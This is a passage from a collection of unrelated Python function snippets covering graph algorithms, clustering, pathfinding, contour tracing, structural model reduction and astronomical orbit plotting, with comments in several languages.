0.3 # penalty of the difference of the pathdist\n pathpix_penalty = 2 # penalty of the difference of pixel values between the point and the previous point\n nray = tab.shape[1]\n\n #tab = np.hstack((tab,tab[:, 0].reshape(tab.shape[0], 1)))\n #pixtab = np.hstack((pixtab,pixtab[:, 0].reshape(pixtab.shape[0], 1)))\n #gxtab = np.hstack((gxtab,gxtab[:, 0].reshape(gxtab.shape[0], 1)))\n #gytab = np.hstack((gytab,gytab[:, 0].reshape(gytab.shape[0], 1)))\n\n tab = np.hstack((tab,tab,tab)) # horizontally stack the tab matrix to prepare for the filtering on the result\n pixtab = np.hstack((pixtab,pixtab,pixtab))\n gxtab = np.hstack((gxtab,gxtab,gxtab))\n gytab = np.hstack((gytab,gytab,gytab))\n\n tab = (tab - 
tab.min()) / (tab.max() - tab.min()) # noralize the tab matrix\n pixtab = (pixtab - pixtab.min()) / (pixtab.max() - pixtab.min()) * -1 # for we want to find the white contour of the cell so we multipy -1 on the pixtab\n # tab = tab / np.median(tab)\n # pixtab = pixtab / np.median(pixtab)\n path = np.zeros(tab.shape)\n path[:, 0] = np.array(range(0, tab.shape[0]))\n score = np.zeros(tab.shape)\n score[:, 1] = tab[:, 1]\n\n for i in range(1, tab.shape[1]):\n for j in range(tab.shape[0]):\n mins = np.Inf # record the min value of the ray\n minat = 0\n for k in range(-pathdist, pathdist+1):\n if(0 <= (j+k) and (j+k) < tab.shape[0]):\n s = pixtab[j, i]\n pixdiff = abs(pixtab[j, i] - pixtab[j+k, i-1])\n s += pixdiff * pathpix_penalty # two kinds of penalty\n s += abs(k) * pathdist_penalty\n s += score[j+k, i-1]\n\n if(s < mins):\n mins = s\n minat = j + k\n path[j, i] = minat\n score[j, i]= mins\n\n start = int(np.argmin(score[:, -1]))\n path = path.astype(np.int32)\n minpath = [start]\n for i in range(tab.shape[1]-1, 0, -1):\n minpath.append(path[minpath[-1], i])\n minpath = minpath[::-1]\n # print(len(minpath))\n minpath = savgol_filter(minpath, 15, 3) # apply a Savitzky-Golay filter to the raw minpath signal\n minpath = minpath[nray:nray*2] # cut the middle part of minpath whose length is nray\n return np.array(minpath).astype(np.int32)", "def search_minimum_coloring(self,alpha,Beta):\n bestSol=[]\n bestK=0\n k= self.g.n\n iter = 0\n global encore\n encore = True\n timer = threading.Timer(200, findeboucle)\n timer.start()\n while(encore):\n tabus_search = self.compute_solution(k,alpha,Beta)\n if(tabus_search[1]==0):\n bestSol= copyMatrix(tabus_search[0])\n #tmax=tabus_search[2]\n bestK=k\n k=k-1\n return(bestK,bestSol)", "def Wygrana():\r\n for x in range (0, ROZMIAR_PLANSZY):\r\n for y in range (0, ROZMIAR_PLANSZY):\r\n for kierunek in (\"poziom\", \"pion\", \"skos prawy\", \"skos lewy\"):\r\n iksy, kolka = SprawdzLinie ((x, y), kierunek)\r\n if iksy == 5:\r\n return X\r\n if kolka == 5:\r\n return O\r\n return False", "def findroot(self,x0,method='fmin',**kwargs):\n return self._optimize(x0,'root',method,**kwargs)", "def ACM_Kruskal(G):\n pass", "def kruskal_solve(self):\n\n\t\tmin_span_tree = Graph(self.graph.vertices, [])\n\t\tedges = sorted(self.graph.edges[:], key=lambda x: x[2])\n\t\tcount = 0\n\n\t\twhile count < len(self.graph.vertices) - 1:\n\t\t\tcur_edge = edges[0]\n\t\t\tedges = edges[1:]\n\t\t\t\n\t\t\tnode1, node2, weight = cur_edge\n\t\t\tif not min_span_tree.is_connected(node1, node2):\n\t\t\t\tmin_span_tree.edges.append(cur_edge)\n\t\t\t\tcount = count + 1\n\n\t\treturn min_span_tree", "def guyan_forsparse(M, K, master=None, fraction=None):\n\n\n\tif master is None:\n\t\tif fraction is None:\n\t\t\tfraction = 0.25\n\n\t\tratios = np.diag(M) / np.diag(K)\n\t\tranked = [i[0] for i in sorted(enumerate(ratios), key=lambda x: x[1])]\n\t\tthresh = int(fraction * ratios.size)\n\t\tif (thresh >= ratios.size) or thresh == 0:\n\t\t\tprint(\"Can't keep\", thresh, 'DOFs.')\n\t\t\tprint(\"Fraction of\", fraction, \"is too low or too high.\")\n\t\t\treturn 0, 0, 0, 0, 0\n\n\t\tmaster = ranked[-thresh:]\n\n\tmaster = np.array(master)\n\n\tncoord = M.shape[0]\n\n\ti = np.arange(0, ncoord)\n\n\ti = i.reshape(1,-1)\n\n\ti = i + np.ones((1,i.shape[1]),int)\n\n\tlmaster = master.shape[1]\n\n\ti[0,master-1] = np.transpose(np.zeros((lmaster,1)))\n\n\ti = np.sort((i), axis =1)\n\n\tslave = i[0,lmaster + 0:ncoord]\n\n\tK= lil_matrix(K)\n\n\tslave = slave.reshape(1,-1)\n\n\tmaster = 
master-np.ones((1,master.shape[0]),int)\n\n\tmaster = master.ravel()\n\n\tslave = slave - np.ones((1,slave.shape[0]),int)\n\n\tslave = slave.ravel()\n\n\tkss = slice_forSparse(K, slave, slave)\n\n\tksm = slice_forSparse(K, slave, master)\n\n\tT= np.zeros((len(master)+len(slave), len(master)))\n\n\tT= lil_matrix(T)\n\n\tT[master,:lmaster] = sps.eye(lmaster,lmaster)\n\n\tT[slave,0:lmaster]=spla.spsolve(-kss,ksm)\n\n\tMred = T.T * M * T\n\n\tKred = T.T * K * T\n\n\treturn Mred, Kred, master", "def MinSpanningTreeKruskal(self):\n nodes = [n for n in self.nodes]\n edges = [e for e in self.edges]\n self.ResetGraph()\n for n in nodes:\n self.AddNode(n)\n n.neighbours = []\n\n \n edges.sort(key=lambda e: e.weight)\n \n for edge in edges:\n if not self.CausesCycleIfAdded(edge):\n self.ConnectByEdge(edge)\n if len(self.edges) == self.NodesCount()-1:\n break", "def sky_orbits(test=True):\n \n t = Table.read('/home/ana/data/baumgardt_positions.fits')\n \n ind_disterr = ~np.isfinite(t['e_Rsun'])\n t['e_Rsun'][ind_disterr] = 0.1 * t['Rsun'][ind_disterr]\n e_max = np.nanmax(t['e_Rsun'][~ind_disterr])\n ind_cap = t['e_Rsun']>e_max\n t['e_Rsun'][ind_cap] = e_max\n \n clusters = ['NGC 3201', 'NGC 4590', 'NGC 5824', 'NGC 5272', 'NGC 5139', 'NGC 5024']\n #clusters = ['NGC 5824', 'NGC 5024']\n N = len(clusters)\n \n match = dict()\n match['NGC 3201'] = dict(streams=['gjoll'], direction=[-1], nstep=[35], gc_label='NGC\\n3201', gcra_off=0*u.deg, gcdec_off=-13*u.deg, gcl_off=0*u.deg, gcb_off=-13*u.deg, stream_label=['$Gj\\\\\\\" oll$'], stream_ra=[-156*u.deg], stream_dec=[-4.5*u.deg], eq_angle=[-45*u.deg], stream_l=[-148*u.deg], stream_b=[-33*u.deg], gal_angle=[22*u.deg])\n \n match['NGC 4590'] = dict(streams=['fjorm'], direction=[1], nstep=[100], gc_label='NGC\\n4590', gcra_off=-15*u.deg, gcdec_off=0*u.deg, gcl_off=-13*u.deg, gcb_off=-10*u.deg, stream_label=['$Fj\\\\\\\" orm$'], stream_ra=[-22*u.deg], stream_dec=[66*u.deg], eq_angle=[35*u.deg], stream_l=[110*u.deg], stream_b=[50*u.deg], gal_angle=[-50*u.deg])\n \n match['NGC 5024'] = dict(streams=['sylgr', 'ravi'], direction=[-1, 1], nstep=[300,500], gc_label='NGC\\n5024', gcra_off=-15*u.deg, gcdec_off=0*u.deg, gcl_off=10*u.deg, gcb_off=-20*u.deg, stream_label=['Sylgr', 'Ravi'], stream_ra=[-70*u.deg, 83*u.deg], stream_dec=[2*u.deg, -47*u.deg], eq_angle=[25*u.deg, 65*u.deg], stream_l=[-110*u.deg, -18.5*u.deg], stream_b=[62*u.deg, -47*u.deg], gal_angle=[30*u.deg, -10*u.deg])\n \n match['NGC 5139'] = dict(streams=['fimbulthul'], direction=[-1], nstep=[70], gc_label='NGC\\n5139', gcra_off=-5*u.deg, gcdec_off=-15*u.deg, gcl_off=0*u.deg, gcb_off=-12*u.deg, stream_label=['Fimbulthul'], stream_ra=[-20*u.deg], stream_dec=[-15*u.deg], eq_angle=[0*u.deg], stream_l=[-20*u.deg], stream_b=[45*u.deg], gal_angle=[0*u.deg])\n \n match['NGC 5272'] = dict(streams=['svol'], direction=[1], nstep=[70], gc_label='NGC\\n5272', gcra_off=-15*u.deg, gcdec_off=10*u.deg, gcl_off=-23*u.deg, gcb_off=-17*u.deg, stream_label=['$Sv\\\\\\\" ol$'], stream_ra=[-2*u.deg], stream_dec=[34*u.deg], eq_angle=[-10*u.deg], stream_l=[55*u.deg], stream_b=[55*u.deg], gal_angle=[-65*u.deg])\n \n match['NGC 5824'] = dict(streams=['triangulum', 'turbio'], direction=[1,1], nstep=[700,1], gc_label='NGC\\n5824', gcra_off=15*u.deg, gcdec_off=-5*u.deg, gcl_off=15*u.deg, gcb_off=-5*u.deg, stream_label=['Triangulum', 'Turbio'], stream_ra=[152*u.deg, 130*u.deg], stream_dec=[32*u.deg, -51*u.deg], eq_angle=[-48*u.deg, 30*u.deg], stream_l=[120*u.deg, -82*u.deg], stream_b=[-31*u.deg, -57*u.deg], gal_angle=[70*u.deg, 
105*u.deg])\n \n dt = 0.5*u.Myr\n wangle = 180*u.deg\n ra_off = 120*u.deg\n l_off = 0*u.deg\n \n colors = [mpl.cm.plasma(0.95*x/N) for x in range(N)]\n \n np.random.seed(27529)\n if test:\n Nsample = 1\n else:\n Nsample = 100\n \n plt.close()\n fig = plt.figure(figsize=(12,12))\n \n ax0 = fig.add_subplot(211, projection='mollweide')\n ax1 = fig.add_subplot(212, projection='mollweide')\n ax = [ax0, ax1]\n \n for i in range(N):\n #ind = t['Name']== clusters[i]\n ind = t['Name']==clusters[i]\n t_ = t[ind]\n \n c = coord.SkyCoord(ra=t_['RAJ2000'], dec=t_['DEJ2000'], distance=t_['Rsun'], pm_ra_cosdec=t_['pmRA_'], pm_dec=t_['pmDE'], radial_velocity=t_['RV'], frame='icrs')\n cgal = c.transform_to(coord.Galactic)\n #w0 = gd.PhaseSpacePosition(c.transform_to(gc_frame).cartesian)[0]\n \n color = colors[i]\n alpha_text = 0.8\n \n plt.sca(ax[0])\n plt.plot((c.ra + ra_off).wrap_at(wangle).rad, c.dec.rad, '+', color=color, mew=3, ms=15, label=t_['Name'][0])\n plt.text((c.ra + ra_off + match[clusters[i]]['gcra_off']).wrap_at(wangle).rad, (c.dec + match[clusters[i]]['gcdec_off']).rad, match[clusters[i]]['gc_label'], fontsize='small', ha='center', va='center', alpha=alpha_text)\n \n plt.sca(ax[1])\n plt.plot((cgal.l + l_off).wrap_at(wangle).rad, cgal.b.rad, '+', color=color, mew=3, ms=15, label=t_['Name'][0])\n plt.text((cgal.l + l_off + match[clusters[i]]['gcl_off']).wrap_at(wangle).rad, (cgal.b + match[clusters[i]]['gcb_off']).rad, match[clusters[i]]['gc_label'], fontsize='small', ha='center', va='center', alpha=alpha_text)\n \n\n for j in range(len(match[clusters[i]]['direction'])):\n # sample gc positional uncertainties\n for k in range(-1, Nsample):\n if k==-1:\n c = coord.SkyCoord(ra=t_['RAJ2000'], dec=t_['DEJ2000'], distance=t_['Rsun'], pm_ra_cosdec=t_['pmRA_'], pm_dec=t_['pmDE'], radial_velocity=t_['RV'], frame='icrs')\n w0 = gd.PhaseSpacePosition(c.transform_to(gc_frame).cartesian)[0]\n \n lw = 1.5\n alpha = 1\n else:\n c = coord.SkyCoord(ra=t_['RAJ2000'], dec=t_['DEJ2000'], distance=t_['Rsun'] + np.random.randn()*t_['e_Rsun'], pm_ra_cosdec=t_['pmRA_'] + np.random.randn()*t_['e_pmRA_'], pm_dec=t_['pmDE'] + np.random.randn()*t_['e_pmDE'], radial_velocity=t_['RV'] + np.random.randn()*t_['e_RV'], frame='icrs')\n w0 = gd.PhaseSpacePosition(c.transform_to(gc_frame).cartesian)[0]\n \n lw = 1\n alpha = 0.1\n \n orbit = ham.integrate_orbit(w0, dt=dt*match[clusters[i]]['direction'][j], n_steps=match[clusters[i]]['nstep'][j])\n orbit_eq = orbit.to_coord_frame(coord.ICRS, galactocentric_frame=gc_frame)\n orbit_gal = orbit.to_coord_frame(coord.Galactic, galactocentric_frame=gc_frame)\n \n \n plt.sca(ax[0])\n dra = (orbit_eq.ra+ra_off).wrap_at(wangle)[1:] - (orbit_eq.ra+ra_off).wrap_at(wangle)[:-1]\n if np.any(np.abs(dra)>180*u.deg):\n pos_break = dra>180*u.deg\n ind_break = np.argmax(pos_break)\n ipad = 1\n plt.plot((orbit_eq.ra+ra_off).wrap_at(wangle).rad[:ind_break-ipad], orbit_eq.dec.rad[:ind_break-ipad], '-', color=color, lw=lw, label='', alpha=alpha)\n plt.plot((orbit_eq.ra+ra_off).wrap_at(wangle).rad[ind_break+ipad:], orbit_eq.dec.rad[ind_break+ipad:], '-', color=color, lw=lw, label='', alpha=alpha)\n else:\n plt.plot((orbit_eq.ra+ra_off).wrap_at(wangle).rad, orbit_eq.dec.rad, '-', color=color, lw=lw, label='', alpha=alpha)\n \n plt.sca(ax[1])\n dl = orbit_gal.l.wrap_at(wangle)[1:] - orbit_gal.l.wrap_at(wangle)[:-1]\n if np.any(np.abs(dl)>180*u.deg):\n pos_break = dl>180*u.deg\n ind_break = np.argmax(pos_break)\n ipad = 1\n plt.plot((orbit_gal.l+l_off).wrap_at(wangle).rad[:ind_break-ipad], 
orbit_gal.b.rad[:ind_break-ipad], '-', color=color, lw=lw, label='', alpha=alpha)\n plt.plot((orbit_gal.l+l_off).wrap_at(wangle).rad[ind_break+ipad:], orbit_gal.b.rad[ind_break+ipad:], '-', color=color, lw=lw, label='', alpha=alpha)\n else:\n plt.plot((orbit_gal.l+l_off).wrap_at(wangle).rad, orbit_gal.b.rad, '-', color=color, lw=lw, label='', alpha=alpha)\n \n # add streams\n pkl = pickle.load(open('../data/streams/data_{:s}.pkl'.format(match[clusters[i]]['streams'][j]), 'rb'))\n cs = coord.SkyCoord(ra=pkl['dec'][0], dec=pkl['dec'][1], frame='icrs')\n cs_gal = cs.transform_to(coord.Galactic)\n \n plt.sca(ax[0])\n plt.plot((cs.ra+ra_off).wrap_at(wangle).rad, cs.dec.rad, 'o', color=color, ms=8, label=match[clusters[i]]['streams'][j])\n plt.text(coord.Longitude(match[clusters[i]]['stream_ra'][j]).wrap_at(wangle).rad, coord.Latitude(match[clusters[i]]['stream_dec'][j]).rad, match[clusters[i]]['stream_label'][j], fontsize='small', alpha=alpha_text, rotation=match[clusters[i]]['eq_angle'][j].value, ha='center', va='center')\n \n plt.sca(ax[1])\n plt.plot((cs_gal.l+l_off).wrap_at(wangle).rad, cs_gal.b.rad, 'o', color=color, ms=8, label=match[clusters[i]]['streams'][j])\n plt.text(coord.Longitude(match[clusters[i]]['stream_l'][j]).wrap_at(wangle).rad, coord.Latitude(match[clusters[i]]['stream_b'][j]).rad, match[clusters[i]]['stream_label'][j], fontsize='small', alpha=alpha_text, rotation=match[clusters[i]]['gal_angle'][j].value, ha='center', va='center')\n \n \n plt.sca(ax[0])\n plt.grid(ls=':')\n plt.xlabel('R.A. [deg]')\n plt.ylabel('Dec [deg]')\n\n plt.gca().xaxis.set_ticklabels([])\n \n xloc = coord.Longitude(np.arange(-150,180,30)*u.deg)\n xloc = np.delete(xloc, [3])\n yloc = coord.Latitude(5*u.deg)\n Nx = len(xloc)\n \n for i in range(Nx):\n plt.text(xloc[i].wrap_at(wangle).rad, yloc.rad, '{:.0f}$\\degree$'.format((xloc[i]-ra_off).wrap_at(wangle).degree), alpha=0.6, ha='center', va='center')\n \n \n plt.sca(ax[1])\n plt.grid(ls=':')\n plt.xlabel('Galactic longitude [deg]')\n plt.ylabel('Galactic latitude [deg]')\n \n plt.gca().xaxis.set_ticklabels([])\n \n xloc = coord.Longitude(np.arange(-150,180,30)*u.deg)\n xloc = np.delete(xloc, [2,3])\n yloc = coord.Latitude(5*u.deg)\n Nx = len(xloc)\n \n for i in range(Nx):\n plt.text(xloc[i].wrap_at(wangle).rad, yloc.rad, '{:.0f}$\\degree$'.format((xloc[i]+l_off).wrap_at(wangle).degree), alpha=0.6, ha='center', va='center')\n \n \n \n plt.tight_layout(h_pad=2)\n plt.savefig('../paper/sky_orbits.pdf')", "def get_shortest_route_floyd(network, start,destination, excludings=[]):\n\n # On récupère la liste des villes\n list_city = network[1].keys()\n \n # Si la ville de départ ou de fin n'existe pas\n if start not in list_city or destination not in list_city:\n return None\n\n # On retire les villes à exclure\n list_city = [x for x in list_city if x not in excludings]\n\n\n # Initialisation de se qu'on a besoin\n matrix = []\n distance = []\n n = len(list_city)\n\n \n # On construit la matrice adjacente où indique la distance si il existe une autoroute entre 2 villes\n for x in range(n): \n matrix.append( [] )\n distance.append( [] )\n for y in range(n):\n road_id = get_road_to(network,list_city[x],list_city[y])\n if road_id != None:\n matrix[x].append( get_length(network,road_id) )\n else:\n matrix[x].append( None )\n distance[x].append( [road_id] ) # Autoroute -> format: ['LA']\n\n\t \n # Algorithme de Floyd\n for k in range(n):\n for i in range(n):\n for j in range(n):\n if ( matrix[i][k] != None and matrix[k][j] != None ) and ( ( matrix[i][j] == None ) 
or ( matrix[i][j] > matrix[i][k] + matrix[k][j] ) ):\n                    matrix[i][j] = matrix[i][k] + matrix[k][j]\n\t\t    \n\t\t    # Outside Floyd / personal addition\n                    if i != k and j != k: # If i == k or j == k, it means we are adding an extra result to cell ij\n                        distance[i][j] = [] # Otherwise it means a shorter path was found, so the old path is discarded\n                        distance[i][j].extend( distance[i][k] ) # Extra stretch of highway traveled -> format: ['LA','AH']\n                        distance[i][j].extend( distance[k][j] ) # Extra stretch of highway traveled -> format: ['LA','AH']\n\n\t\t    \n    # Simply retrieve the list of highways traveled\n    idx_start = list_city.index( start )\n    idx_destination = list_city.index( destination )\n    distance_minimum = distance[ idx_start ][ idx_destination ]\n\n    \n    # If no solution is found, return None\n    if distance_minimum == [None]:\n        distance_minimum = None\n    \n    return distance_minimum", "def DBSCAN(M, eps, min_points):\n    colors = ['r', 'g', 'b', 'y', 'c', 'm']  # color array - a different color for each cluster\n    checked = np.zeros(M.shape[\n        0])  # array of checked points, filled with zeros; once a point has been checked its value is changed to 1\n    classification = np.empty(M.shape[0])\n    classification.fill(0)\n    cluster_count = 0\n    for i in range(0, len(colors)):  # loop responsible for creating the clusters (each cluster gets its own color)\n        for j in range(0, len(checked)):  # search for the first unchecked point\n            if checked[j] != 1:\n                seeds = cluster(M, j, eps)\n                startpoint = j\n                if min_points > len(seeds):\n                    checked[\n                        startpoint] = 1  # if the point has fewer neighbors than the minimum, mark it as checked and ignore it from now on\n\n                if min_points <= len(seeds):\n                    plt.plot(M[startpoint, 0], M[startpoint, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n                             markersize=np.pi * 3 ** 2)  # if it has the minimum number of neighbors, draw a circle on the plot\n                    checked[startpoint] = 1\n                    classification[startpoint] = i + 1\n                    break  # if an unchecked point was found, exit the loop\n        while len(seeds) > 0:\n\n            point = seeds[0]  # take the first point of the seeds array as the next point\n            results = cluster(M, point, eps)  # store the points that satisfy the neighborhood condition\n            if checked[point] != 1:\n                if min_points > len(results) and (classification[point] == 0 or classification[point] == -1):\n                    checked[\n                        point] = 1  # if the point has fewer neighbors than the minimum, mark it as checked and classify it as a border point\n                    plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n                             markersize=8)\n                    classification[point] = -(i + 1)\n                if min_points <= len(results):\n                    plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n                             markersize=np.pi * 3 ** 2)  # if it has the minimum number of neighbors, draw a circle on the plot\n                    checked[point] = 1\n                    classification[point] = i + 1\n                    for k in range(0, len(results)):\n                        result_point = results[k]\n                        seeds.append(\n                            result_point)  # add to the seeds array the points that were in the neighborhood of point\n            seeds.remove(seeds[0])  # remove the already-processed element from the seeds array\n        if np.sum(checked) == M.shape[\n            0]:  # if all points have been checked, exit the loop - by then all clusters should be done\n            break\n    return plt.show()", "def find(Map, PosI, PosF):\n    \n    # For tests, see Pathfinding and Pathfinding2 \n    \n    
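    # Added bookkeeping notes: Hvalue holds the Manhattan distance to the goal
    # (NaN on walls), Gvalue is set to a flat 10 for every reached cell, and
    # Fvalue = Gvalue + Hvalue is the expansion priority, so with a flat G this
    # behaves like greedy best-first search rather than full A*. OpenList holds
    # (cell, letter) pairs where the letter ('U'/'D'/'L'/'R') points back toward
    # the cell it was reached from and drives the trace-back at the end.
    # Hypothetical usage sketch (3x3 grid, 1 = wall, returns the cell path):
    # find(np.array([[0,1,0],[0,1,0],[0,0,0]]), (0,0), (0,2))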
InitialPosI = PosI\n    InitialPosF = PosF\n    Chemin = []\n    \n    Hvalue = np.zeros((np.shape(Map))) #Distance\n    Gvalue = np.zeros((np.shape(Map))) #Movement Cost\n    Fvalue = np.zeros((np.shape(Map))) #G+H \n    Gvalue[:] = np.nan #initialize Gvalue to a NaN matrix\n    \n    OpenList = [(InitialPosI,'N')]\n    CloseList = []\n    \n    # Initialization of Hvalue\n    for i in range(np.shape(Hvalue)[0]):\n        for j in range(np.shape(Hvalue)[1]):\n            if Map[i,j] !=1:\n                Hvalue[i,j] = abs(i-PosF[0]) + abs(j-PosF[1])\n            else:\n                Hvalue[i,j] = np.nan\n\n### Round 1 (+initializations)\n    \n    CloseList.append(tuple(PosI))\n    \n    if PosI[0]-1>=0 and Map[PosI[0]-1,PosI[1]] != 1 and ((PosI[0]-1,PosI[1]) not in OpenList) and ((PosI[0]-1,PosI[1]) not in CloseList): #Check vertical up\n        OpenList.append(((PosI[0]-1,PosI[1]),'D')) #D : arrow pointing down..\n    if PosI[0]+1<=np.shape(Map)[0]-1 and Map[PosI[0]+1,PosI[1]] != 1 and ((PosI[0]+1,PosI[1]) not in OpenList) and ((PosI[0]+1,PosI[1]) not in CloseList): #Check vertical down\n        OpenList.append(((PosI[0]+1,PosI[1]),'U')) \n    if PosI[1]-1>=0 and Map[PosI[0],PosI[1]-1] != 1 and ((PosI[0],PosI[1]-1) not in OpenList) and ((PosI[0],PosI[1]-1) not in CloseList): #Check horiz left\n        OpenList.append(((PosI[0],PosI[1]-1),'R'))\n    if PosI[1]+1<=np.shape(Map)[1]-1 and Map[PosI[0],PosI[1]+1] != 1 and ((PosI[0],PosI[1]+1) not in OpenList) and ((PosI[0],PosI[1]+1) not in CloseList): #Check horiz right\n        OpenList.append(((PosI[0],PosI[1]+1),'L'))\n    \n    \n    for OV in OpenList: #OV for OpenValue \n        Gvalue[OV[0][0],OV[0][1]] = 10\n    \n    Fvalue = np.copy(Gvalue + Hvalue)\n    for CV in CloseList: #CV for ClosedValue\n        Fvalue[CV[0],CV[1]] = np.nan\n    \n\n#### Round NEXT \n    ###Toward the min of Fvalue:\n    while PosF not in CloseList and PosI != PosF:\n        \n        if np.all(np.isnan(Fvalue)): #Check whether F equals an all-NaN matrix\n#            print('No path')\n            return(False) # either return False, or return the initial position, so it's fine..\n        \n        Index = np.argwhere(Fvalue == np.nanmin(Fvalue))\n        PosI = Index.tolist()[0]\n        \n        CloseList.append(tuple(PosI))\n        if PosI[0]-1>=0 and Map[PosI[0]-1,PosI[1]] != 1 and ((PosI[0]-1,PosI[1]) not in OpenList) and ((PosI[0]-1,PosI[1]) not in CloseList): #Check vertical up\n            OpenList.append(((PosI[0]-1,PosI[1]),'D')) #DOWN (arrow pointing down..)\n        if PosI[0]+1<=np.shape(Map)[0]-1 and Map[PosI[0]+1,PosI[1]] != 1 and ((PosI[0]+1,PosI[1]) not in OpenList) and ((PosI[0]+1,PosI[1]) not in CloseList): #Check vertical down\n            OpenList.append(((PosI[0]+1,PosI[1]),'U')) #Up\n        if PosI[1]-1>=0 and Map[PosI[0],PosI[1]-1] != 1 and ((PosI[0],PosI[1]-1) not in OpenList) and ((PosI[0],PosI[1]-1) not in CloseList): #Check horiz left\n            OpenList.append(((PosI[0],PosI[1]-1),'R')) #Right\n        if PosI[1]+1<=np.shape(Map)[1]-1 and Map[PosI[0],PosI[1]+1] != 1 and ((PosI[0],PosI[1]+1) not in OpenList) and ((PosI[0],PosI[1]+1) not in CloseList): #Check horiz right\n            OpenList.append(((PosI[0],PosI[1]+1),'L')) #Left\n        \n        for OV in OpenList:\n            Gvalue[OV[0][0],OV[0][1]] = 10\n        \n        Fvalue = np.copy(Gvalue + Hvalue)\n        for CV in CloseList:\n            Fvalue[CV[0],CV[1]] = np.nan\n        \n\n    \n############## TRACING BACK \n    PosF = InitialPosF\n\n    while InitialPosI not in Chemin:\n        \n        for Trace in OpenList:\n            if Trace[0] == PosF:\n                Chemin.append(PosF)\n                if Trace[1] == 'U':\n                    PosF = (PosF[0]-1,PosF[1]) #Go up\n                elif Trace[1] == 'D':\n                    PosF = (PosF[0]+1,PosF[1]) #Go down\n                elif Trace[1] == 'L':\n                    PosF = (PosF[0],PosF[1]-1) #Go left\n                elif Trace[1] == 'R':\n                    PosF = (PosF[0],PosF[1]+1) #Go right\n#            else:\n#                
print(Chemin)\n Chemin.reverse()\n return(Chemin)", "def _cluster_k_medoids_minibatch(self, num_variants, tolerance, batch_size, cache, max_cycles):\n avail_medoid_indices = [self.index[name] for name in self.tree.get_ordered_names() if name in self.available]\n chsn_indices = [self.index[n] for n in self.chosen]\n num_chsn = len(chsn_indices)\n dists = self._transform_distances(tolerance)\n # This spaces the initial centroids randomly around the tree\n seq_chunk = len(avail_medoid_indices) // (num_variants - num_chsn)\n rand_inds = []\n for i in range(num_variants - num_chsn):\n rand_inds.append(avail_medoid_indices[random.randint(i*seq_chunk, (i+1)*seq_chunk-1)])\n best_med_inds = np.array(chsn_indices + rand_inds)\n # Initial random sets\n best_clusters = self._partition_nearest(best_med_inds, dists)\n best_scores = self._sum_dist_scores(best_med_inds, best_clusters, dists)\n best_score = sum(best_scores)\n # Using a simple greedy algorithm, typically converges after 2-5 iterations.\n num_cycles = 0\n improvement = True\n while improvement == True:\n improvement = False\n med_inds = best_med_inds.copy()\n if len(avail_medoid_indices) > batch_size:\n avail_minibatch_inds = random.sample(avail_medoid_indices, batch_size)\n else:\n avail_minibatch_inds = avail_medoid_indices\n for i in range(num_chsn, num_variants):\n for ind in avail_minibatch_inds:\n if ind in med_inds: continue\n med_inds[i] = ind\n score = self._score_pattern(med_inds, dists)\n if score < best_score:\n best_score = score\n best_med_inds[i] = ind\n improvement = True\n else:\n med_inds[i] = best_med_inds[i]\n num_cycles += 1\n cache['cycles_used'] += 1\n if cache['quit_now'] or max_cycles != None and num_cycles >= max_cycles:\n break\n if cache['quit_now'] or max_cycles != None and num_cycles >= max_cycles:\n improvement = False\n break\n best_clusters = self._partition_nearest(best_med_inds, dists)\n best_scores = self._sum_dist_scores(best_med_inds, best_clusters, dists)\n return best_med_inds, best_scores", "def k_corona(G, k, core_number=None):\n\n def func(v, k, c):\n return c[v] == k and k == sum(1 for w in G[v] if c[w] >= k)\n\n return _core_subgraph(G, func, k, core_number)", "def AGM_prim(mtr_adj, limited_nodes=[], raiz=1):\n\tnum_vertices = len(mtr_adj)\n\n\tfila = []\n\tvertices = [] # ordenados de acordo com a chave\n\t\n\t# adicionando os nodos na lista de vertices e ordenando pela key\n\tfor i in range( 1, num_vertices+1 ):\n\t\tvertices.append( vertice(i) )\n\n\tvertices.sort(key = lambda x: x.key)\n\tlog.debug('vertices: %s' % vertices)\n\t\n\t# fila a ser ordenada pela distancia\n\tfor nodo in vertices:\n\t\tfila.append(nodo)\n\n\t# se a raiz tiver grau máximo =1, seleciona o nodo mais próximo da raiz\n\t# para tornar ele a 'raiz'\n\tverificar_raiz(mtr_adj, limited_nodes, vertices, raiz)\n\t\n\tvertices[raiz-1].dist = 0\n\n\t# ordena a fila por ordem de distancia para o predecessor.\n\treordenar(fila)\n\tlog.debug('fila: %s' % fila)\n\n\t# criando arvore com os nodos que aceitam mais de 1 grau\n\twhile len(fila):\n\t\t# nodo a ser testado\n\t\tu = fila.pop(0)\n\t\t\n\t\t# evitar os nodos com grau máximo = 1 por enquanto\n\t\tif u.key in limited_nodes:\n\t\t\tcontinue\n\t\t\n\n\t\t# passando por todos os outros vértices, e adicionando\n\t\t# para selecionar os nodos que tem o nodo u como predecessor.\n\t\tfor v in range(1, num_vertices+1):\n\t\t\tif u.key != v and \\\n\t\t\tv not in limited_nodes and \\\n\t\t\tmtr_adj[ u.key-1 ][v-1] < vertices[v-1].dist and \\\n\t\t\tna_fila(v, 
fila):\n\t\t\t\tvertices[v-1].pred = u.key\n\t\t\t\tvertices[v-1].dist = mtr_adj[ u.key-1 ][v-1]\n\t\t\t\treordenar(fila)\n\t\tlog.debug('fila: %s' % fila)\t\n\t\n\t# conectando os nodos que aceitam grau maximo = 1 na arvore\n\tfor u in vertices:\n\t\tif u == raiz:\n\t\t\tcontinue\n\n\t\t# para cada nodo u de grau máximo = 1\n\t\tif u.key in limited_nodes:\n\t\t\t# verificar qual o nodo mais próximo, não limitado, diferente de u\n\t\t\tfor v in range(1, num_vertices+1):\n\t\t\t\tv_dist = mtr_adj[u.key-1][v-1] # distância de u até v\n\t\t\t\tif v != u.key and v_dist < u.dist and v not in limited_nodes:\n\t\t\t\t\tu.dist = v_dist\n\t\t\t\t\tu.pred = v\n\n\treturn vertices", "def _get_ring_nodes(m, namin=3, namax=9, remove_redudant=T):\n # first search for rings\n sets = []\n for i in range(namin, namax+1):\n #if i in [3,4,5]:\n pat_i = '*~1' + '~*'*(i-2) + '~*1'\n #else:\n # pat_i = '*:1' + ':*'*(i-2) + ':*1'\n Qi = Chem.MolFromSmarts( pat_i )\n for tsi in m.GetSubstructMatches(Qi):\n set_i = set(tsi)\n if set_i not in sets:\n sets.append( set(tsi) )\n if remove_redudant:\n # now remove those rings that are union of smaller rings\n n = len(sets)\n sets_remove = []\n ijs = itl.combinations( list(range(n)), 2 )\n sets_u = []\n for i,j in ijs:\n set_ij = sets[i].union( 